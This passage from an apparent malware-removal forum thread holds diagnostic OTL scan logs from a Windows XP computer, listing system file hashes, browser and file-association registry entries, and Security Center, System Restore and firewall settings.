[2004/08/03 23:56:46 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=4E74AF063C3271FBEA20DD940CFD1184 -- C:\WINDOWS\$NtUninstallKB951748_0$\mswsock.dll
[2008/06/20 11:46:57 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=832E4DD8964AB7ACC880B2837CB1ED20 -- C:\WINDOWS\$hf_mig$\KB951748\SP3GDR\mswsock.dll
[2008/06/20 11:46:57 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=832E4DD8964AB7ACC880B2837CB1ED20 -- C:\WINDOWS\$NtUninstallKB2509553$\mswsock.dll
[2008/06/20 10:02:47 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=943337D786A56729263071623BBB9DE5 -- C:\WINDOWS\ERDNT\cache\mswsock.dll
[2008/06/20 10:02:47 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=943337D786A56729263071623BBB9DE5 -- C:\WINDOWS\system32\dllcache\mswsock.dll
[2008/06/20 10:02:47 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=943337D786A56729263071623BBB9DE5 -- C:\WINDOWS\system32\mswsock.dll
[2008/04/13 18:12:01 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=B4138E99236F0F57D4CF49BAE98A0746 -- C:\WINDOWS\$NtUninstallKB951748$\mswsock.dll
[2008/04/13 18:12:01 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=B4138E99236F0F57D4CF49BAE98A0746 -- C:\WINDOWS\ServicePackFiles\i386\mswsock.dll
[2008/06/20 11:43:05 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=FCEE5FCB99F7C724593365C706D28388 -- C:\WINDOWS\$hf_mig$\KB2509553\SP3QFE\mswsock.dll
[2008/06/20 11:43:05 | 000,245,248 | ---- | M] (Microsoft Corporation) MD5=FCEE5FCB99F7C724593365C706D28388 -- C:\WINDOWS\$hf_mig$\KB951748\SP3QFE\mswsock.dll

< MD5 for: NWPROVAU.DLL >
[2008/04/13 18:12:02 | 000,142,336 | ---- | M] (Microsoft Corporation) MD5=06E587F41466569F32BEAAC7260E8AEC -- C:\WINDOWS\ServicePackFiles\i386\nwprovau.dll
[2008/04/13 18:12:02 | 000,142,336 | ---- | M] (Microsoft Corporation) MD5=06E587F41466569F32BEAAC7260E8AEC -- C:\WINDOWS\system32\nwprovau.dll
[2006/10/13 06:41:38 | 000,142,336 | ---- | M] (Microsoft Corporation) MD5=808CB47D7F6BE51B0354CD628CF45978 -- C:\WINDOWS\$hf_mig$\KB923980\SP2QFE\nwprovau.dll
[2006/10/13 06:35:12 | 000,142,336 | ---- | M] (Microsoft Corporation) MD5=AEEB687B865E1BAB04BB9C3604F92CEF -- C:\WINDOWS\$NtServicePackUninstall$\nwprovau.dll
[2004/08/03 23:56:46 | 000,144,384 | ---- | M] (Microsoft Corporation) MD5=F01D97A8E0380BA52F58249A7B3BD7F1 -- C:\WINDOWS\$NtUninstallKB923980$\nwprovau.dll

< MD5 for: PNRPNSP.DLL >
[2004/08/03 23:56:46 | 000,048,640 | ---- | M] (Microsoft Corporation) MD5=74D3620D2E63489975E3956A40DDD35F -- C:\WINDOWS\$NtServicePackUninstall$\pnrpnsp.dll
[2008/04/13 18:12:02 | 000,058,880 | ---- | M] (Microsoft Corporation) MD5=AF1449AC1D79D37C7026C1D8912DDA8E -- C:\WINDOWS\ServicePackFiles\i386\pnrpnsp.dll
[2008/04/13 18:12:02 | 000,058,880 | ---- | M] (Microsoft Corporation) MD5=AF1449AC1D79D37C7026C1D8912DDA8E -- C:\WINDOWS\system32\pnrpnsp.dll

< MD5 for: SERVICES.EXE >
[2009/02/06 05:06:24 | 000,110,592 | ---- | M] (Microsoft Corporation) MD5=020CEAAEDC8EB655B6506B8C70D53BB6 -- C:\WINDOWS\$hf_mig$\KB956572\SP3QFE\services.exe
[2008/04/13 18:12:34 | 000,108,544 | ---- | M] (Microsoft Corporation) MD5=0E776ED5F7CC9F94299E70461B7B8185 -- C:\WINDOWS\$NtUninstallKB956572$\services.exe
[2008/04/13 18:12:34 | 000,108,544 | ---- | M] (Microsoft Corporation) MD5=0E776ED5F7CC9F94299E70461B7B8185 -- C:\WINDOWS\ServicePackFiles\i386\services.exe
[2009/02/06 05:11:05 | 000,110,592 | ---- | M] (Microsoft Corporation) MD5=65DF52F5B8B6E9BBD183505225C37315 -- C:\WINDOWS\ERDNT\cache\services.exe
[2009/02/06 05:11:05 | 000,110,592 | ---- | M] (Microsoft Corporation) MD5=65DF52F5B8B6E9BBD183505225C37315 -- C:\WINDOWS\system32\dllcache\services.exe
[2009/02/06 05:11:05 | 000,110,592 | ---- | M] (Microsoft Corporation) MD5=65DF52F5B8B6E9BBD183505225C37315 -- C:\WINDOWS\system32\services.exe
[2004/08/03 23:56:56 | 000,108,032 | ---- | M] (Microsoft Corporation) MD5=C6CE6EEC82F187615D1002BB3BB50ED4 -- C:\WINDOWS\$NtServicePackUninstall$\services.exe

< MD5 for: SVCHOST.EXE >
[2012/12/14 16:49:28 | 000,216,424 | ---- | M] () MD5=22101A85B3CA2FE2BE05FE9A61A7A83D -- C:\Program Files\Malwarebytes' Anti-Malware\Chameleon\svchost.exe
[2008/04/13 18:12:36 | 000,014,336 | ---- | M] (Microsoft Corporation) MD5=27C6D03BCDB8CFEB96B716F3D8BE3E18 -- C:\WINDOWS\ERDNT\cache\svchost.exe
[2008/04/13 18:12:36 | 000,014,336 | ---- | M] (Microsoft Corporation) MD5=27C6D03BCDB8CFEB96B716F3D8BE3E18 -- C:\WINDOWS\ServicePackFiles\i386\svchost.exe
[2008/04/13 18:12:36 | 000,014,336 | ---- | M] (Microsoft Corporation) MD5=27C6D03BCDB8CFEB96B716F3D8BE3E18 -- C:\WINDOWS\system32\svchost.exe
[2004/08/03 23:56:58 | 000,014,336 | ---- | M] (Microsoft Corporation) MD5=8F078AE4ED187AAABC0A305146DE6716 -- C:\WINDOWS\$NtServicePackUninstall$\svchost.exe

< MD5 for: USERINIT.EXE >
[2004/08/03 23:56:58 | 000,024,576 | ---- | M] (Microsoft Corporation) MD5=39B1FFB03C2296323832ACBAE50D2AFF -- C:\WINDOWS\$NtServicePackUninstall$\userinit.exe
[2008/04/13 18:12:38 | 000,026,112 | ---- | M] (Microsoft Corporation) MD5=A93AEE1928A9D7CE3E16D24EC7380F89 -- C:\WINDOWS\ERDNT\cache\userinit.exe
[2008/04/13 18:12:38 | 000,026,112 | ---- | M] (Microsoft Corporation) MD5=A93AEE1928A9D7CE3E16D24EC7380F89 -- C:\WINDOWS\ServicePackFiles\i386\userinit.exe
[2008/04/13 18:12:38 | 000,026,112 | ---- | M] (Microsoft Corporation) MD5=A93AEE1928A9D7CE3E16D24EC7380F89 -- C:\WINDOWS\system32\userinit.exe

< MD5 for: WINLOGON.EXE >
[2004/08/03 23:56:58 | 000,502,272 | ---- | M] (Microsoft Corporation) MD5=01C3346C241652F43AED8E2149881BFE -- C:\WINDOWS\$NtServicePackUninstall$\winlogon.exe
[2012/12/14 16:49:28 | 000,216,424 | ---- | M] () MD5=22101A85B3CA2FE2BE05FE9A61A7A83D -- C:\Program Files\Malwarebytes' Anti-Malware\Chameleon\winlogon.exe
[2008/04/13 18:12:39 | 000,507,904 | ---- | M] (Microsoft Corporation) MD5=ED0EF0A136DEC83DF69F04118870003E -- C:\WINDOWS\ERDNT\cache\winlogon.exe
[2008/04/13 18:12:39 | 000,507,904 | ---- | M] (Microsoft Corporation) MD5=ED0EF0A136DEC83DF69F04118870003E -- C:\WINDOWS\ServicePackFiles\i386\winlogon.exe
[2008/04/13 18:12:39 | 000,507,904 | ---- | M] (Microsoft Corporation) MD5=ED0EF0A136DEC83DF69F04118870003E -- C:\WINDOWS\system32\winlogon.exe

< MD5 for: WINRNR.DLL >
[2004/08/03 23:56:48 | 000,016,896 | ---- | M] (Microsoft Corporation) MD5=2C8FDB176F22629EA5342DB474FAC391 -- C:\WINDOWS\$NtServicePackUninstall$\winrnr.dll
[2008/04/13 18:12:09 | 000,016,896 | ---- | M] (Microsoft Corporation) MD5=D72B9EC3337B247A666F098F3D6B43DE -- C:\WINDOWS\ServicePackFiles\i386\winrnr.dll
[2008/04/13 18:12:09 | 000,016,896 | ---- | M] (Microsoft Corporation) MD5=D72B9EC3337B247A666F098F3D6B43DE -- C:\WINDOWS\system32\winrnr.dll

< %systemroot%\*. /mp /s >

< hklm\software\clients\startmenuinternet|command /rs >
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\chrome.exe\shell\open\command\\: "C:\Program Files\Google\Chrome\Application\chrome.exe" [2013/01/07 18:06:24 | 001,248,360 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\HideIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /HideShortcuts [2013/01/10 21:16:06 | 000,864,768 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ShowIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /ShowShortcuts [2013/01/10 21:16:06 | 000,864,768 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ReinstallCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /SetAsDefaultAppGlobal [2013/01/10 21:16:06 | 000,864,768 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\open\command\\: C:\Program Files\Mozilla Firefox\firefox.exe [2013/01/10 21:17:01 | 000,917,552 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\properties\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -preferences [2013/01/10 21:17:01 | 000,917,552 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\safemode\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -safe-mode [2013/01/10 21:17:01 | 000,917,552 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\ReinstallCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --make-default-browser [2013/01/07 18:06:24 | 001,248,360 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\HideIconsCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --hide-icons [2013/01/07 18:06:24 | 001,248,360 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\ShowIconsCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --show-icons [2013/01/07 18:06:24 | 001,248,360 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\shell\open\command\\: "C:\Program Files\Google\Chrome\Application\chrome.exe" [2013/01/07 18:06:24 | 001,248,360 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ReinstallCommand: "C:\WINDOWS\system32\ie4uinit.exe" -reinstall [2012/10/31 18:35:35 | 000,174,080 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\HideIconsCommand: "C:\WINDOWS\system32\ie4uinit.exe" -hide [2012/10/31 18:35:35 | 000,174,080 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ShowIconsCommand: "C:\WINDOWS\system32\ie4uinit.exe" -show [2012/10/31 18:35:35 | 000,174,080 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\naom\command\\: "C:\Program Files\Internet Explorer\iexplore.exe" -extoff [2009/03/08 13:09:26 | 000,638,816 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\open\command\\: "C:\Program Files\Internet Explorer\iexplore.exe" [2009/03/08 13:09:26 | 000,638,816 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\MSN Explorer\shell\open\command\\: "C:\Program Files\MSN\MSNCoreFiles\MSN6.EXE" [2004/06/14 10:29:28 | 000,094,208 | ---- | M] (Microsoft Corporation)

< hklm\software\clients\startmenuinternet|command /64 /rs >
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\chrome.exe\shell\open\command\\: "C:\Program Files\Google\Chrome\Application\chrome.exe" [2013/01/07 18:06:24 | 001,248,360 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\HideIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /HideShortcuts [2013/01/10 21:16:06 | 000,864,768 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ShowIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /ShowShortcuts [2013/01/10 21:16:06 | 000,864,768 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ReinstallCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /SetAsDefaultAppGlobal [2013/01/10 21:16:06 | 000,864,768 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\open\command\\: C:\Program Files\Mozilla Firefox\firefox.exe [2013/01/10 21:17:01 | 000,917,552 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\properties\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -preferences [2013/01/10 21:17:01 | 000,917,552 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\safemode\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -safe-mode [2013/01/10 21:17:01 | 000,917,552 | ---- | M] (Mozilla Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\ReinstallCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --make-default-browser [2013/01/07 18:06:24 | 001,248,360 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\HideIconsCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --hide-icons [2013/01/07 18:06:24 | 001,248,360 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\InstallInfo\\ShowIconsCommand: "C:\Program Files\Google\Chrome\Application\chrome.exe" --show-icons [2013/01/07 18:06:24 | 001,248,360 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\Google Chrome\shell\open\command\\: "C:\Program Files\Google\Chrome\Application\chrome.exe" [2013/01/07 18:06:24 | 001,248,360 | ---- | M] (Google Inc.)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ReinstallCommand: "C:\WINDOWS\system32\ie4uinit.exe" -reinstall [2012/10/31 18:35:35 | 000,174,080 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\HideIconsCommand: "C:\WINDOWS\system32\ie4uinit.exe" -hide [2012/10/31 18:35:35 | 000,174,080 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ShowIconsCommand: "C:\WINDOWS\system32\ie4uinit.exe" -show [2012/10/31 18:35:35 | 000,174,080 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\naom\command\\: "C:\Program Files\Internet Explorer\iexplore.exe" -extoff [2009/03/08 13:09:26 | 000,638,816 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\open\command\\: "C:\Program Files\Internet Explorer\iexplore.exe" [2009/03/08 13:09:26 | 000,638,816 | ---- | M] (Microsoft Corporation)
HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\MSN Explorer\shell\open\command\\: "C:\Program Files\MSN\MSNCoreFiles\MSN6.EXE" [2004/06/14 10:29:28 | 000,094,208 | ---- | M] (Microsoft Corporation)

< %systemroot%\system32\*.dll /lockedfiles >

< %systemroot%\Tasks\*.job /lockedfiles >

< %systemroot%\system32\drivers\*.sys /lockedfiles >

< End of report >
#11
goodseed

OTL Extras logfile created on: 1/18/2013 10:56:15 PM - Run 3
OTL by OldTimer - Version 3.2.31.0 Folder = C:\Documents and Settings\Owner\Desktop
Windows XP Home Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

503.29 Mb Total Physical Memory | 161.04 Mb Available Physical Memory | 32.00% Memory free
1.20 Gb Paging File | 0.67 Gb Available in Paging File | 55.53% Paging File free
Paging file location(s): C:\pagefile.sys 756 1512 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 144.18 Gb Total Space | 75.04 Gb Free Space | 52.05% Space Free | Partition Type: NTFS
Drive D: | 4.85 Gb Total Space | 0.83 Gb Free Space | 17.18% Space Free | Partition Type: FAT32

Computer Name: YOUR-46E94OWX6A | User Name: Owner | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

========== Extra Registry (All) ==========


========== File Associations ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.bat [@ = batfile] -- "%1" %*
.chm [@ = chm.file] -- C:\WINDOWS\hh.exe (Microsoft Corporation)
.cmd [@ = cmdfile] -- "%1" %*
.com [@ = ComFile] -- "%1" %*
.cpl [@ = cplfile] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
.exe [@ = exefile] -- "%1" %*
.hlp [@ = hlpfile] -- C:\WINDOWS\System32\winhlp32.exe (Microsoft Corporation)
.hta [@ = htafile] -- C:\WINDOWS\System32\mshta.exe (Microsoft Corporation)
.html [@ = ChromeHTML] -- C:\Program Files\Google\Chrome\Application\chrome.exe (Google Inc.)
.inf [@ = inffile] -- C:\WINDOWS\System32\NOTEPAD.EXE (Microsoft Corporation)
.ini [@ = inifile] -- C:\WINDOWS\System32\NOTEPAD.EXE (Microsoft Corporation)
.url [@ = InternetShortcut] -- rundll32.exe ieframe.dll,OpenURL %l
.js [@ = JSFile] -- C:\WINDOWS\System32\WScript.exe (Microsoft Corporation)
.jse [@ = JSEFile] -- C:\WINDOWS\System32\WScript.exe (Microsoft Corporation)
.pif [@ = piffile] -- "%1" %*
.reg [@ = regfile] -- C:\WINDOWS\regedit.exe (Microsoft Corporation)
.scr [@ = scrfile] -- "%1" /S
.txt [@ = txtfile] -- C:\WINDOWS\System32\NOTEPAD.EXE (Microsoft Corporation)
.vbe [@ = VBEFile] -- C:\WINDOWS\System32\WScript.exe (Microsoft Corporation)
.vbs [@ = VBSFile] -- C:\WINDOWS\System32\WScript.exe (Microsoft Corporation)
.wsf [@ = WSFFile] -- C:\WINDOWS\System32\WScript.exe (Microsoft Corporation)
.wsh [@ = WSHFile] -- C:\WINDOWS\System32\WScript.exe (Microsoft Corporation)

[HKEY_CURRENT_USER\SOFTWARE\Classes\<extension>]
.html [@ = ChromeHTML] -- Reg Error: Key error. File not found

========== Shell Spawning ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [edit] -- %SystemRoot%\System32\NOTEPAD.EXE %1 (Microsoft Corporation)
batfile [open] -- "%1" %*
batfile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
chm.file [open] -- "%SYSTEMROOT%\hh.exe" %1 (Microsoft Corporation)
cmdfile [edit] -- %SystemRoot%\System32\NOTEPAD.EXE %1 (Microsoft Corporation)
cmdfile [open] -- "%1" %*
cmdfile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
comfile [open] -- "%1" %*
cplfile [cplopen] -- rundll32.exe shell32.dll,Control_RunDLL "%1",%*
exefile [open] -- "%1" %*
helpfile [open] -- winhlp32.exe %1 (Microsoft Corporation)
hlpfile [open] -- %SystemRoot%\System32\winhlp32.exe %1 (Microsoft Corporation)
htafile [open] -- C:\WINDOWS\system32\mshta.exe "%1" %* (Microsoft Corporation)
htmlfile [edit] -- "C:\Program Files\Microsoft Office\OFFICE11\msohtmed.exe" %1 (Microsoft Corporation)
htmlfile [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
htmlfile [print] -- rundll32.exe %SystemRoot%\system32\mshtml.dll,PrintHTML "%1" (Microsoft Corporation)
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
https [open] -- "C:\Program Files\Google\Chrome\Application\chrome.exe" -- "%1" (Google Inc.)
inffile [install] -- %SystemRoot%\System32\rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %1 (Microsoft Corporation)
inffile [open] -- %SystemRoot%\System32\NOTEPAD.EXE %1 (Microsoft Corporation)
inffile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
inifile [open] -- %SystemRoot%\System32\NOTEPAD.EXE %1 (Microsoft Corporation)
inifile [print] -- %SystemRoot%\System32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
InternetShortcut [open] -- rundll32.exe ieframe.dll,OpenURL %l
InternetShortcut [print] -- "C:\WINDOWS\system32\rundll32.exe" "C:\WINDOWS\system32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
jsfile [edit] -- %SystemRoot%\System32\Notepad.exe %1 (Microsoft Corporation)
jsfile [open] -- %SystemRoot%\System32\WScript.exe "%1" %* (Microsoft Corporation)
jsfile [print] -- %SystemRoot%\System32\Notepad.exe /p %1 (Microsoft Corporation)
jsefile [edit] -- %SystemRoot%\System32\Notepad.exe %1 (Microsoft Corporation)
jsefile [open] -- %SystemRoot%\System32\WScript.exe "%1" %* (Microsoft Corporation)
jsefile [print] -- %SystemRoot%\System32\Notepad.exe /p %1 (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [edit] -- %SystemRoot%\system32\NOTEPAD.EXE %1 (Microsoft Corporation)
regfile [open] -- regedit.exe "%1" (Microsoft Corporation)
regfile [merge] -- Reg Error: Key error.
regfile [print] -- %SystemRoot%\system32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
txtfile [open] -- %SystemRoot%\system32\NOTEPAD.EXE %1 (Microsoft Corporation)
txtfile [print] -- %SystemRoot%\system32\NOTEPAD.EXE /p %1 (Microsoft Corporation)
txtfile [printto] -- %SystemRoot%\system32\notepad.exe /pt "%1" "%2" "%3" "%4" (Microsoft Corporation)
vbefile [edit] -- %SystemRoot%\System32\Notepad.exe %1 (Microsoft Corporation)
vbefile [open] -- %SystemRoot%\System32\WScript.exe "%1" %* (Microsoft Corporation)
vbefile [print] -- %SystemRoot%\System32\Notepad.exe /p %1 (Microsoft Corporation)
vbsfile [edit] -- %SystemRoot%\System32\Notepad.exe %1 (Microsoft Corporation)
vbsfile [open] -- %SystemRoot%\System32\WScript.exe "%1" %* (Microsoft Corporation)
vbsfile [print] -- %SystemRoot%\System32\Notepad.exe /p %1 (Microsoft Corporation)
wsffile [edit] -- %SystemRoot%\System32\Notepad.exe %1 (Microsoft Corporation)
wsffile [open] -- %SystemRoot%\System32\WScript.exe "%1" %* (Microsoft Corporation)
wsffile [print] -- %SystemRoot%\System32\Notepad.exe /p %1 (Microsoft Corporation)
wshfile [open] -- %SystemRoot%\System32\WScript.exe "%1" %* (Microsoft Corporation)
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe /idlist,%I,%L (Microsoft Corporation)
Folder [explore] -- %SystemRoot%\Explorer.exe /e,/idlist,%I,%L (Microsoft Corporation)
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "%programfiles%\internet explorer\iexplore.exe" (Microsoft Corporation)

========== Security Center Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = 0
"FirewallDisableNotify" = 0
"UpdatesDisableNotify" = 0
"AntiVirusOverride" = 1
"FirewallOverride" = 0

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]

========== System Restore Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sr]
"Start" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SrService]
"Start" = 2

========== Firewall Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
"139:TCP" = 139:TCP:*:Enabled:@xpsp2res.dll,-22004
"445:TCP" = 445:TCP:*:Enabled:@xpsp2res.dll,-22005
"137:UDP" = 137:UDP:*:Enabled:@xpsp2res.dll,-22001
"138:UDP" = 138:UDP:*:Enabled:@xpsp2res.dll,-22002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall" = 0
"DoNotAllowExceptions" = 0
"DisableNotifications" = 0

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"139:TCP" = 139:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22004
"445:TCP" = 445:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22005
"137:UDP" = 137:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22001
"138:UDP" = 138:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22002
"1900:UDP" = 1900:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22007
"2869:TCP" = 2869:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22008

========== Authorized Applications List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]

